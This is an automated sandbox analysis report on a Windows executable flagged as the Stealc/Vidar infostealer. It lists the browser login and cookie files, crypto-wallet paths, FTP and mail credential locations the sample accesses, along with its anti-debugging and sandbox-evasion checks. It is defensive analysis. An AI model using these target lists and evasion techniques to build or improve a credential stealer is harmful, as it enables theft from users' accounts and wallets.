Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_008ADA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_008AE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_008B3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008AF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008A16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_008ABE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_008B38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_008AED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_008B4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008ADE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A1160 GetSystemInfo,ExitProcess,

0_2_008A1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1979573658.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarezU'
Source: file.exe, 00000000.00000002.1979573658.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1979573658.00000000012A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13285
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13282
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13297
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14472
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13301
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13337

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_008A45C0

Source: C:\Users\user\Desktop\file.exe

0_2_008B9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B9750 mov eax, dword ptr fs:[00000030h]

0_2_008B9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_008B78E0

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7336, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_008B9600

Source: file.exe, file.exe, 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: 27Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_008B7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_008B7980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_008B7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_008B7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1752059108.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7336, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.;

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1979573658.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7336, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1752059108.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1979573658.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7336, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
